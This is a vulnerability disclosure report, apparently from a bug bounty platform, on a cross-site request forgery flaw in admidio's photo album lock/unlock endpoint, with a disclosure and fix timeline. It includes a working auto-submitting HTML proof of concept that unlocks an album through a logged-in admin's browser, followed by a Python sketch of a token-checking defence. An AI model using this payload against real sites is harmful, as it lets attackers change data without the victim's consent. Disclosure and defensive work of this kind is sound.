Cross-Site Request Forgery lead to lock and unlock Album in admidio/admidio

Valid

Reported on

Jun 28th 2023


Description

An attacker is able to lock or unlock any album with this CSRF attack: the lock/unlock endpoint accepts the request from a foreign origin with no anti-CSRF token, relying only on the admin's session cookie.

Proof of Concept

  1. An admin must already be logged in to the browser.
  2. Open CSRF.html (contents below) in that browser:
<html>
    <body>
        <form action="http://localhost/adm_program/modules/photos/photo_album_function.php">
            <input type="hidden" name="photo_uuid" value="b9131a9d-577e-4f06-b87e-5af30714b25b" />
            <input type="hidden" name="mode" value="unlock" />
            <input type="submit" value="Submit request" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

The album b9131a9d-577e-4f06-b87e-5af30714b25b will be unlocked.
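As an added illustration of the defence (this is not admidio's code and not the fix from commit ba3099), the following standalone Python model of the photo_album_function.php endpoint applies the synchronizer token pattern and refuses both the GET submitted by the PoC form above and a forged POST that lacks the session-bound token. The names photo_album_function, Session, Request and ALBUMS are hypothetical; the album UUID is the one from the report.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple


@dataclass
class Session:
    """Server-side session tied to the admin's login cookie (hypothetical)."""
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    method: str
    params: Dict[str, str]          # merged query/form parameters
    session: Optional[Session]      # None when no valid login cookie was sent


# Constructed album store: uuid -> locked flag (UUID taken from the report)
ALBUMS = {"b9131a9d-577e-4f06-b87e-5af30714b25b": True}


def photo_album_function(req: Request) -> Tuple[int, str]:
    """Hardened lock/unlock handler; returns (HTTP status, message)."""
    if req.session is None:
        return 401, "login required"
    # 1. State changes only over POST. The PoC <form> has no method attribute,
    #    so the browser submits it as GET and it is refused here.
    if req.method != "POST":
        return 405, "POST required"
    # 2. The token is stored in the session and rendered into the legitimate
    #    form. A page on another origin cannot read it, so a forged request
    #    cannot supply it. Constant-time comparison avoids a timing side channel.
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, req.session.csrf_token):
        return 403, "invalid CSRF token"
    uuid = req.params.get("photo_uuid", "")
    mode = req.params.get("mode", "")
    if uuid not in ALBUMS or mode not in ("lock", "unlock"):
        return 400, "bad request"
    ALBUMS[uuid] = (mode == "lock")
    return 200, f"album {uuid} {mode}ed"
```

The same token must also be emitted as a hidden field in the application's own lock/unlock form, otherwise legitimate requests fail the check too.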

Acknowledge

Tran Van Nhan from bl4ckh0l3 of GalaxyOne

Impact

The attacker could potentially gain access to sensitive information if the photo album contains images with sensitive data.

We are processing your report and will contact the admidio team within 24 hours. 3 months ago
Tran Van Nhan modified the report
3 months ago
We have contacted a member of the admidio team and are waiting to hear back 3 months ago
Markus Faßbender validated this vulnerability 2 months ago
Tran Van Nhan has been awarded the disclosure bounty
Markus Faßbender marked this as fixed in 4.2.10 with commit ba3099 2 months ago
Markus Faßbender has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jul 16th 2023
Tran Van Nhan (Researcher), 2 months ago:

Hi @maintainer. Could you assign a CVE identifier for this vulnerability?

Markus Faßbender published this vulnerability 2 months ago